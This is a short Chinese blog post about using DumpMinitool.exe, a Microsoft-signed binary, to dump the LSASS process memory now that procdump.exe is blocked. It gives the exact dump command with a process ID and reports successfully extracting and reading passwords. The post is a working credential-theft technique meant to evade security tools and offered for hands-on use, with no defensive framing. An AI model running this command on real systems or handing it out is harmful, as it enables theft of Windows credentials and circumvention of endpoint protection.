国外研究人员又发现了一个带微软签名的dump lsass的工具 跟当时procdump.exe一样,但现在procdump.exe已经被拦截了 虽然不知道还能持续多久,但还是来实践一下
https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=twOtT_clemvEYGQ9YdZ02w
使用
DumpMinitool.exe --file lsass.txt --processId 596 --dumpType Full
成功dump出lsass进程
下载下来读取密码
成功读取密码
若有收获,就点个赞吧
0 人点赞
